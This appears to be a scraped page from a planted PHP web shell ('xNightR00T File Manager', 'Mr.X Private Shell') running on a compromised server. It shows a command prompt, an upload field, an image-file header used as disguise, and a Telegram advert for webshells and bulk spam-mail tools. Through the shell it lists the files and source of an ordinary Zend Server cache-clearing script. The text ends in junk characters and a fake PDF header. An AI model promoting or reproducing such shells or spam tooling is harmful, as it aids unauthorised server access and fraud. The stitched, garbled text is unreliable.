xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

require_once __DIR__ . DIRECTORY_SEPARATOR . 'zsd_common.php';
    
/// Make sure we got a valid 'cache' GET parameter set
if(!isset($_GET["cache"])) {
    die();
}

/**
 * @param $keys 
 * @return clear $keys from the datacache 
 */
function cleadDatacache( $keys, $namespaces, $isDisk ) {
    for( $i = 0; $i < count($keys); ++$i ) {
        $key = $keys[ $i ];
        $ns  = $namespaces[ $i ];
        
        if ( empty($ns) ) {
            $isDisk ? zend_disk_cache_delete( $key ) : zend_shm_cache_delete( $key );
            
        } else if ( empty($key) ) {
            $isDisk ? zend_disk_cache_clear( $ns ) : zend_shm_cache_clear( $ns );
            
        } else {
            $isDisk ? zend_disk_cache_delete( "$ns::$key" ) : zend_shm_cache_delete( "$ns::$key" );
        }
    }
}

/**
 * Clean the cache presented by $type
 * $type can be:
 * 'datacache_shm'
 * 'datacache_disk'
 * 'optimizerplus'
 * 'pagecache'
 */
function cleanCache($type) {
    if ( $type == 'datacache_shm' && function_exists('zend_shm_cache_clear')) {
        if ( isset($_GET["keys"]) && isset($_GET["namespaces"]) ) {
            // Clear array of keys
            cleadDatacache( $_GET["keys"], $_GET["namespaces"], false );
            
        } else {
            zend_shm_cache_clear();
            
        }
        
    } else if ( $type == 'datacache_disk' && function_exists('zend_disk_cache_clear')) {
        if ( isset($_GET["keys"]) && isset($_GET["namespaces"]) ) {
            // Clear array of keys
            cleadDatacache( $_GET["keys"], $_GET["namespaces"], true );
            
        } else {
            zend_disk_cache_clear();
        }
    } else if ( $type == 'optimizerplus' && function_exists('opcache_reset')) {
        opcache_reset();
        
    } else if ( $type == 'pagecache' && function_exists ('page_cache_remove_all_cached_contents') ) {
        page_cache_remove_all_cached_contents();
        
    } else if ( $type == 'pagecache_by_rule' && function_exists ('page_cache_remove_cached_contents_by_rule') ) {
        // make sure we got a 'rule' index defined
        if ( !isset($_GET['ruleName']) ) {
            return;
        }
        if ( isset($_GET['uri']) && $_GET['uri'] ) {
            page_cache_remove_cached_contents_by_uri($_GET['ruleName'], $_GET['uri']);
            
        } else {
            page_cache_remove_cached_contents_by_rule($_GET['ruleName']);
        }

    } else if ( $type == 'pagecache_by_rules_ids' && function_exists ('page_cache_remove_cached_contents_by_rules_ids') ) {
        page_cache_remove_cached_contents_by_rules_ids(explode(",", $_GET['rules']));
    }
}

/// Clean the cache
if ( isset($_GET["cache"]) ) {
    cleanCache( $_GET["cache"] );
}

Filemanager

Name Type Size Permission Actions
zsd_clean_cache.php File 2.68 KB 0644
zsd_common.php File 539 B 0644
zsd_datacache_clear_ns.php File 639 B 0644
zsd_datacache_delete_entry.php File 641 B 0644
zsd_dc_print_shm_info.php File 153 B 0644
zsd_get_directive_value.php File 730 B 0644
zsd_hash_sign.php File 1.69 KB 0644
zsd_is_webserver_alive.php File 106 B 0644
zsd_loaded_modules.php File 314 B 0644
zsd_node_profile.php File 1003 B 0644
zsd_pagecache_clean.php File 1 KB 0644
zsd_php_info.php File 1.66 KB 0644
zsd_phpver.php File 217 B 0644
zsd_print_directives.php File 979 B 0644
zsd_print_extensions.php File 1.65 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1